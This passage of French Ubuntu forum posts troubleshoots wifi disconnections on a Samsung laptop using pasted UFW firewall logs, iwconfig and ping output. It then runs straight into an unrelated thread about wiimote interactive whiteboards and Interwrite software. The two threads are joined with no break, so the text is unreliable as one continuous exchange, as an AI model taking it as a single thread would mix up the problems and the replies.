MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=18884 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1855.397420] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 1873.437599] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=67.83.29.46 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=14608 PROTO=UDP SPT=34519 DPT=59653 LEN=38 (entrée standard):[ 1876.809734] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=67.83.29.46 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=14611 PROTO=UDP SPT=34519 DPT=59653 LEN=38 (entrée standard):[ 1881.611970] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=178.191.186.216 DST=192.168.1.40 LEN=48 TOS=0x00 PREC=0x00 TTL=52 ID=47871 PROTO=UDP SPT=60000 DPT=59653 LEN=28 (entrée standard):[ 1883.331092] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=67.83.29.46 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=14613 PROTO=UDP SPT=34519 DPT=59653 LEN=38 (entrée standard):[ 1935.277466] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=27555 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1938.567180] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=27898 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1944.954786] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=28531 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1967.219070] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=86.160.33.28 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=111 ID=4168 PROTO=UDP SPT=12743 DPT=59653 LEN=75 (entrée standard):[ 1980.493396] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2015.497269] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=201.83.130.199 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=26048 PROTO=UDP SPT=55710 DPT=59653 LEN=38 (entrée standard):[ 2020.543353] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=190.231.94.68 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=29440 PROTO=UDP SPT=64609 DPT=59653 LEN=38 (entrée standard):[ 2040.553047] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=67.83.29.46 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=14617 PROTO=UDP SPT=34519 DPT=59653 LEN=38 (entrée standard):[ 2062.151883] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=86.85.156.51 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=52 ID=7982 PROTO=UDP SPT=10633 DPT=59653 LEN=75 (entrée standard):[ 2081.939014] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.175.8.166 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=23359 PROTO=UDP SPT=39465 DPT=59653 LEN=38 (entrée standard):[ 2126.170640] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=91.153.62.95 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=19149 PROTO=UDP SPT=57555 DPT=59653 LEN=38 (entrée standard):[ 2129.301479] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=91.153.62.95 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=19183 PROTO=UDP SPT=57555 DPT=59653 LEN=38 (entrée standard):[ 2141.292364] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=76.219.229.48 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=20686 PROTO=UDP SPT=14063 DPT=59653 LEN=38 (entrée standard):[ 2161.947708] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=69.171.135.88 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=109 ID=30662 PROTO=UDP SPT=52394 DPT=59653 LEN=38 (entrée standard):[ 2180.779086] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=86.131.227.154 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=968 PROTO=UDP SPT=37508 DPT=59653 LEN=38 (entrée standard):[ 2210.214811] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=142.161.150.73 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=114 ID=7473 PROTO=UDP SPT=42221 DPT=59653 LEN=75 (entrée standard):[ 2219.820455] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=22000 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 2250.601778] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.77.105.79 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=3264 PROTO=UDP SPT=57921 DPT=59653 LEN=38 (entrée standard):[ 2261.198314] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=31678 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 2281.740059] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=188.4.70.135 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=15661 PROTO=UDP SPT=42914 DPT=59653 LEN=38 (entrée standard):[ 2305.697614] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=190.16.105.104 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=43 ID=0 DF PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 2320.476787] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=188.4.36.7 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=2395 DF PROTO=UDP SPT=53094 DPT=59653 LEN=38 (entrée standard):[ 2355.550727] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2360.263186] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.175.8.166 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=824 PROTO=UDP SPT=39465 DPT=59653 LEN=38 (entrée standard):[ 2388.989681] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=197.163.27.6 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=111 ID=3180 PROTO=UDP SPT=13662 DPT=59653 LEN=75 (entrée standard):[ 2419.111319] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=186.52.131.16 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=46 ID=12036 PROTO=UDP SPT=24797 DPT=59653 LEN=38 (entrée standard):[ 2422.129755] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=186.52.131.16 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=46 ID=12037 PROTO=UDP SPT=24797 DPT=59653 LEN=38 (entrée standard):[ 2440.798577] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=69.171.135.88 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=109 ID=6599 PROTO=UDP SPT=52394 DPT=59653 LEN=38 (entrée standard):[ 2480.327857] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=109.186.73.51 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=110 ID=27228 PROTO=UDP SPT=10035 DPT=59653 LEN=75 (entrée standard):[ 2480.482212] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2505.439606] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=92.239.224.137 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=50 ID=16891 PROTO=UDP SPT=24874 DPT=59653 LEN=38 (entrée standard):[ 2520.326512] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=216.8.132.206 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=23722 PROTO=UDP SPT=24252 DPT=59653 LEN=38 (entrée standard):[ 2542.139479] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=227 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 2561.215791] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=178.174.218.92 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=109 ID=21615 PROTO=UDP SPT=44003 DPT=59653 LEN=38 (entrée standard):[ 2582.414098] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=78.56.233.179 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=39904 PROTO=UDP SPT=32656 DPT=59653 LEN=38 (entrée standard):[ 2605.516221] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2622.833575] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=69.255.40.5 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=112 ID=9040 PROTO=UDP SPT=46587 DPT=59653 LEN=75 (entrée standard):[ 2642.591036] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.77.105.79 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=23338 PROTO=UDP SPT=57921 DPT=59653 LEN=38 (entrée standard):[ 2694.101037] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=18158 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 2695.587437] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=85.241.8.40 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=7133 PROTO=UDP SPT=47908 DPT=59653 LEN=38 (entrée standard):[ 2703.476545] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=19215 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 2730.549805] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2741.555802] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=87.218.129.117 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=114 ID=51510 PROTO=UDP SPT=25900 DPT=59653 LEN=75 (entrée standard):[ 2774.766776] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=190.194.164.229 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=43 ID=29859 PROTO=UDP SPT=60006 DPT=59653 LEN=75 (entrée standard):[ 2796.621132] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=85.241.8.40 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=50261 PROTO=UDP SPT=47908 DPT=59653 LEN=38 (entrée standard):[ 2799.728894] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=85.241.8.40 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=54068 PROTO=UDP SPT=47908 DPT=59653 LEN=38 (entrée standard):[ 2819.736079] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=46.12.47.190 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=115 ID=15148 PROTO=UDP SPT=53080 DPT=59653 LEN=38 (entrée standard):[ 2855.583102] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 2868.305737] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=188.4.10.101 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=50 ID=36899 PROTO=UDP SPT=51422 DPT=59653 LEN=38 (entrée standard):[ 2895.625459] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=112.207.183.98 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=4325 PROTO=UDP SPT=29276 DPT=59653 LEN=38 (entrée standard):[ 2901.612169] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=88.4.172.58 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 2927.259899] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=177.2.165.29 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=15369 PROTO=UDP SPT=56892 DPT=59653 LEN=38 (entrée standard):[ 2965.894396] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=24.64.205.106 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=25444 PROTO=UDP SPT=11140 DPT=59653 LEN=38 (entrée standard):[ 2968.439507] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=142.68.204.60 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=111 ID=9076 PROTO=UDP SPT=13176 DPT=59653 LEN=75 (entrée standard):[ 2980.515084] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 3019.653204] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=85.218.101.137 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=49 ID=0 DF PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 3037.295512] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=77.248.59.144 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=49 ID=7792 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 3040.175927] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=77.248.59.144 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=49 ID=2659 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 3070.551776] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=76.181.220.237 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=55424 PROTO=UDP SPT=24417 DPT=59653 LEN=38 (entrée standard):[ 3080.195302] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=76.181.220.237 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=56646 PROTO=UDP SPT=24417 DPT=59653 LEN=38 (entrée standard):[ 3105.548910] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 3130.350131] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.78.37.163 DST=192.168.1.40 LEN=48 TOS=0x00 PREC=0x00 TTL=47 ID=14963 PROTO=UDP SPT=63724 DPT=59653 LEN=28 (entrée standard):[ 3151.388237] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.78.37.163 DST=192.168.1.40 LEN=48 TOS=0x00 PREC=0x00 TTL=48 ID=19291 PROTO=UDP SPT=63724 DPT=59653 LEN=28 (entrée standard):[ 3180.574097] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.78.37.163 DST=192.168.1.40 LEN=48 TOS=0x00 PREC=0x00 TTL=48 ID=26054 PROTO=UDP SPT=63724 DPT=59653 LEN=28 (entrée standard):[ 3183.925917] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=114.78.37.163 DST=192.168.1.40 LEN=48 TOS=0x00 PREC=0x00 TTL=48 ID=26776 PROTO=UDP SPT=63724 DPT=59653 LEN=28 (entrée standard):[ 3224.265486] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=177.2.165.29 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=1523 PROTO=UDP SPT=56892 DPT=59653 LEN=38 (entrée standard):[ 3227.701115] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=177.2.165.29 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=2203 PROTO=UDP SPT=56892 DPT=59653 LEN=38 (entrée standard):[ 3241.520140] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=213.57.65.8 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=5524 PROTO=UDP SPT=57708 DPT=59653 LEN=38 (entrée standard):[ 3260.165072] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=24.64.205.106 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=3288 PROTO=UDP SPT=11140 DPT=59653 LEN=38 (entrée standard):[ 3313.381138] wlan0: deauthenticating from 90:94:e4:d2:6a:56 by local choice (reason=3) (entrée standard):[ 3322.761675] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready grep: e: Aucun fichier ou dossier de ce type grep: ath9k: Aucun fichier ou dossier de ce type oumpa@lap-oumpa:~$ cat /var/lib/NetworkManager/NetworkManager.state [main] NetworkingEnabled=true WirelessEnabled=true WWANEnabled=true WimaxEnabled=true oumpa@lap-oumpa:~$ iwconfig eth0 no wireless extensions. lo no wireless extensions. wlan0 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=14 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on Voila En espérant que tu puisse en tirer quelque chose. Hors ligne toutafai Re : Déconnexion sur Batterie [Samsung] tu peux donner le resultat de ping -c3 192.168.1.20 Ubuntu Server 12.04 x32 sur IBM P4. - XP / Seven / Ubuntu 14.04 x64 sur Lenovo ThinkPad. Purée d'unity...difficile de s'y faire - canon MG5350 - Logitech Quickcam 3000 - TNT Intuix S800 - Freebox v6 révolution (Trop de la balle !!!) Utilisateur d'Ubuntu depuis novembre 2006. 23 PC libérés grâce aux OS libres...et de 24 et quel 24 ...car pc au taff et pour le taff ^^ Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] Je suis un wifi différent donc je doute que l'ip demandé soit la même, aucune idée de ce qu'est le mais j'ai été chercher la nouvel ip du gateway ipv4 voila le résultat de la cmd pour les 2 ip, en précisant que le wifi est fonctionnel, et que je ne sais pas trop ce que je fais PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 64 bytes from 192.168.1.1: icmp_req=1 ttl=64 time=3.02 ms 64 bytes from 192.168.1.1: icmp_req=2 ttl=64 time=3.19 ms 64 bytes from 192.168.1.1: icmp_req=3 ttl=64 time=3.32 ms --- 192.168.1.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2003ms rtt min/avg/max/mdev = 3.020/3.180/3.324/0.140 ms ping -c3 192.168.1.20 PING 192.168.1.20 (192.168.1.20) 56(84) bytes of data. From 192.168.1.41 icmp_seq=1 Destination Host Unreachable From 192.168.1.41 icmp_seq=2 Destination Host Unreachable From 192.168.1.41 icmp_seq=3 Destination Host Unreachable --- 192.168.1.20 ping statistics --- 3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 2016ms pipe 3 J' Hors ligne toutafai Re : Déconnexion sur Batterie [Samsung] mais justement une gateway sur 192.168.1.20 c'est pas courant.... la gateway (paserelle en français) désigne la machine (routeur/pc qui partage internet) par laquelle vont transiter les informations pour allez (et venir) d'internet....c'est toi qui a mis cette info, c'est bien cela ? Ubuntu Server 12.04 x32 sur IBM P4. - XP / Seven / Ubuntu 14.04 x64 sur Lenovo ThinkPad. Purée d'unity...difficile de s'y faire - canon MG5350 - Logitech Quickcam 3000 - TNT Intuix S800 - Freebox v6 révolution (Trop de la balle !!!) Utilisateur d'Ubuntu depuis novembre 2006. 23 PC libérés grâce aux OS libres...et de 24 et quel 24 ...car pc au taff et pour le taff ^^ Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] Chez moi je suis l'unique poste ubuntu au sein d'un réseau windows avec entre autre un vpn et toute une floppée de serveur dont je ne suis pas admin, ce qui pourrais expliquer l'ip "étrange" vu qu'il ne vient pas d'une box je ne comprend pas trop "mis" l'info, j'ai simplement c/c ce qu'avais pondu le "wificheck" et j'en ai refais un pour le wifi que j'utilise actuellement. Mais mon soucis vient très clairement de ma machine car ca m'arrive partout. Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] Bon il semblerais que j'ai atteint un nouveau niveau, la déconnexion se fait également sur secteur ( chose que je n'avais jamais constater en 2 ans d'utilisation...). Juste la commande de redémarrage de la carte me serais bien utile. Dernière modification par Alex0000 (Le 25/12/2012, à 15:42) Hors ligne compte supprimé Re : Déconnexion sur Batterie [Samsung] Salut, Sur batterie tu peux essayer de désactiver le mode économie d'énergie de la carte wifi. Voir ici : http://forum.ubuntu-fr.org/viewtopic.php?id=1042031 Alex0000 Re : Déconnexion sur Batterie [Samsung] Je voulais dire secteur ... pas batterie Désolé. je vais quand même jeter un coup d'oeil sur le thread Hors ligne
mao-40 Re : TBI + wiimote + ubuntu En ce qui concerne 'gtkwhiteboard.ico', ce n'est pas l'image de calibration je pense, puisque le logiciel demande de calibrer l'écran avec les 4 coins du bureau et après cela fonctionne bien. Ah ok, j'essaierai au demain au vidéo-projcteur. Dernière modification par mao-40 (Le 04/02/2009, à 00:28) - * HP Quad Core Q9300 2,5GHz - 6Go - Nvidia GeForce GT 610 1Go - Ubuntu 13.10 64 (Gnome-Shell, vivement autre chose !!! ) - Asus X5DAF - ATI 512Mo - Ubuntu 12.04 AMD-64 Hors ligne Jer!cho Re : TBI + wiimote + ubuntu Bon, un retour d'expérience avec Interwrite sous ubuntu. J'ai désactivé les effets de compiz et lancé le fichier d'installation avec sudo et le logiciel s'installe bien. Après redémarrage comme conseillé, le logiciel se lance bien à partir du menu 'applications', me détecte l'absence du matériel (TBI) mais c'est normal puisque je n'ai aucun périphérique connecté à la maison. Si on remet les effets de compiz, Interwrite ne gère plus les pages et on ne peut pas annoter. Sinon, à première vue, presque tout fonctionne... seul handicap et de taille : lorsque je veux insérer un cadre de texte dans une page, ma session se ferme immédiatement. C'est quand même une fonction importante qui n'est pas utilisable... dommage. Un autre retour qui confirme ceci ? Hors ligne mao-40 Re : TBI + wiimote + ubuntu Je viens d'essayer au lycée l'association et le calibrage avec le script python, ça fonctionne impeccable. En effet il n'y a pas les 4 points comme on peut avoir sur d'autres logiciels. Le calibrage se fait directement sur les 4 coins du bureau. La détection Infra rouge est beaucoup plus sensible en effet que celle avec le paquet proposé dans la doc du site sur la wiimote. Sinon, à première vue, presque tout fonctionne... seul handicap et de taille : lorsque je veux insérer un cadre de texte dans une page, ma session se ferme immédiatement. J'avais le même problème que toi pour le cadre texte, et aujourd'hui ça a fonctionné avec clavier virtuel et même avec la reconnaissance de caractères cellwriter. Tu as installé quelle version de wiimote witheboard ? C'est peut-être la version python qui m'a résolu ce problème. - * HP Quad Core Q9300 2,5GHz - 6Go - Nvidia GeForce GT 610 1Go - Ubuntu 13.10 64 (Gnome-Shell, 